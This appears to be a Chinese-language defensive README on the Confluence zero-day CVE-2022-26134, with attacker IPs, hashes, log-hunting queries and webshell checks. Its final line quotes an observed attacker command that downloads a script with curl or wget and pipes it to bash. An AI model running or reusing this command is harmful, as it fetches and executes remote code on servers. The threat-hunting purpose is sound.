本仓库探讨了 Atlassian Confluence 的零日漏洞利用,并从 SecOps 或蓝队(Blue Team)视角提供了防御与分析的视角。
本仓库从 SecOps 或蓝队视角讨论 Atlassian Confluence 的零日漏洞利用及其防御与分析。
在美国阵亡将士纪念日周末期间,Volexity 对其客户拥有的两台运行 Atlassian Confluence Server 软件的面向互联网的 Web 服务器进行了事件响应调查。调查是在检测到主机上的可疑活动后开始的,这些活动包括将 JSP webshell 写入磁盘。Volexity 立即使用 Volexity Surge Collect Pro 从 Confluence Server 系统收集系统内存和关键文件进行分析。在对收集的数据进行彻底审查后,Volexity 能够确定服务器入侵源于攻击者发起漏洞利用以实现远程代码执行。Volexity 随后能够重现该漏洞利用,并识别出一个影响完全最新版本 Confluence Server 的零日漏洞。
在发现并验证此漏洞后,Volexity 于 2022 年 5 月 31 日联系 Atlassian 报告相关细节。Atlassian 此后确认了该漏洞,并将此问题分配为 CVE-2022-26134。已确认该漏洞在 Confluence Server 和 Data Center 的当前版本上有效。
请参阅此处的技术细节。
154.146.34.145
154.16.105.147
156.146.34.46
156.146.34.52
156.146.34.9
156.146.56.136
198.147.22.148
198.147.22.148
221.178.126.244
45.43.19.91
59.163.248.170
64.64.228.239
66.115.182.102
66.115.182.111
67.149.61.16
98.32.230.38
193.106.191.48
f39b321472b8dac2452e4c0bc687cb5aa401ac6687520fdc9fd523a17477886d
f8df4dd46f02dc86d37d46cf4793e036
DeviceProcessEvents
| where InitiatingProcessFileName has_any( @"tomcat9.exe")
//| where ProcessCommandLine has_any (@"whoami.exe",@"nslookup.exe")
(install directory)/logs/*.log 中查找字符串 ${egrep -a -i -f pattern.txt *.log ,其中 pattern.txt 应保存为 ${,或直接尝试 grep "\${" log file path,或尝试 grep "$%7B" log file pathfindstr -i noop.jsp "logpath"confluence_install_dir/work/Standalone/ 目录中查找 $jspname_jsp.java。例如,如果你发现一个名称为 hack.jsp 的 shell,你应该会看到 hack_jsp.java。如果你在磁盘上找不到 hack.jsp,请尝试在 Web 日志中搜索对它的访问。这将提供它何时被访问/删除的重要线索。process where event='CreateProcess' and parent_process_path='/opt/atlassian/confluence/jre/bin/java' and process_user_name='confluence' 可以帮助识别,如 David 在所述./admin/findspaceattachments.jsp
./admin/cluster/hashclustername.jsp
./admin/default.jsp
./classpath.jsp
./errors/notfound.jsp
./500page.jsp
./errors.jsp
./noop.jsp
因此,请查找上面未列出的新创建的文件
./confluence/org/apache/jsp/ 目录中查找不应存在的 .java 文件。java->bash->python->bashbash -c '(curl -s 195.2.79[.]26/cf.sh||wget -q -O- 195.2.79[.]26/cf.sh)|bash